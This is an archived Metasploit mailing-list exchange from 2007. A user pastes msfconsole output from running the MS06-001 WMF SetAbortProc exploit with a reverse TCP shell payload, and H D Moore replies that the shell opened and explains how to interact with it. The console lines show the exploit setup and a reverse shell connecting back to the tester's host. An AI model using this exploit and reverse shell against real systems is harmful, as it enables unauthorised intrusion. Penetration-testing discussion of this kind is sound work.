Metasploit mailing list archives
reverse TCP stager payload
From: hdm at metasploit.com (H D Moore)
Date: Mon, 10 Sep 2007 00:44:36 -0500
Congrats! The exploit worked. To see your shell, type "sessions -l" (lowercase L), and then "sessions -i ID" to interact with it. -HD On Monday 10 September 2007 00:14, black gal wrote:
Hi All While testing a exploit "*ms06_001_wmf_setabortproc*" with payload *Windows Command Shell, Reverse TCP Stager.* I cudn't get full access to the remote machine. It showed the msg below and stopped there. Can anyone tell me whr's the problem lying? ** msf exploit(ms06_001_wmf_setabortproc) > set LPORT 4444 LPORT => 4444 msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Started reverse handler [*] Using URL: http://192.168.1.151:80/pJ3R3Jo<http://192.168.1.151/pJ3R3Jo> [*] Server started. [*] Exploit running as background job. msf exploit(ms06_001_wmf_setabortproc) > [*] Sending stage (474 bytes) [*] Command shell session 1 opened ( 192.168.1.151:4444 -> 192.168.1.104:1082)
Current thread:
- reverse TCP stager payload black gal (Sep 09)
- reverse TCP stager payload H D Moore (Sep 09)
- reverse TCP stager payload black gal (Sep 10)
- reverse TCP stager payload black gal (Sep 10)
- reverse TCP stager payload Patrick Webster (Sep 11)
- reverse TCP stager payload Suman Saini (Sep 11)
- reverse TCP stager payload Patrick Webster (Sep 11)
- reverse TCP stager payload black gal (Sep 11)
- reverse TCP stager payload black gal (Sep 11)
- reverse TCP stager payload H D Moore (Sep 09)